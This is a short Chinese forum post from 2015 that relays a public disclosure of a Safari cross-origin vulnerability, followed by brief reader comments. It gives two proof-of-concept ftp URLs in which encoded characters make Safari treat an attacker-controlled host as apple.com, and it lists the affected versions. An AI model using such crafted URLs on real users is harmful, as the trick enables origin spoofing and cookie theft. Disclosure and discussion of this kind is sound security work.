Safari iOS/OS X/Windows 平台跨域漏洞

  • A+
所属分类:WooYun-Zone

from:http://klikki.fi/adv/safari.html

2015.4.8 苹果升级了很多漏洞,包括Safari的一个跨域漏洞

poc:

ftp://user%40ftp.attacker.tld%2Fexploit.html%[email protected]/

上面的url实际域名是ftp.attacker.tld,但是Safari会认为是apple,这样就可以通过javascript操控apple.com域的内容了。

影响版本:

Safari 7.0.4 on OS X 10.9.3

    Safari on iPhone 3GS, iOS 6.1.6

    Safari on iOS 8.1 simulator

    Safari 5.1.7 on Windows 8.1

但是测试的时候发现除了4.8之前升级的系统之外,似乎都受影响,并且手机端并没有推送补丁。

详情:https://support.apple.com/en-us/HT201222

Safari测试URL:

ftp://123.57.78.99%2fexp.html%[email protected]/

  1. 1#

    孤独行者 (一位孤独的路人) | 2015-04-13 14:56

    哎哟我去

  2. 2#

    付弘雪 | 2015-04-13 14:59

    6666666666666666

  3. 3#

    浅蓝 (摸摸大) | 2015-04-13 15:38

    好厉害的样子

  4. 4#

    retanoj | 2015-04-13 15:46

    哎我去。。

  5. 5#

    TellYouThat | 2015-04-13 15:59

  6. 6#

    _Evil (科普是一种公益行为) | 2015-04-14 09:34

  7. 7#

    Sunshie | 2015-04-14 09:57

  8. 8#

    Lmy (话说名字太长容易被人关注) | 2015-04-14 11:08

    太神奇了。。。

  9. 9#

    肉肉 | 2015-04-14 11:39

    为什么手机还没有补丁呢

  10. 10#

    假剑心 (本ID出租。30/天,可包月。) | 2015-04-14 12:38

    同域的情况下,safari的ftp协议能读http协议下的东西?

  11. 11#

    Sogili (.) 长短短 (.) | 2015-04-15 22:46

    @剑心 cookie. 我也觉得神奇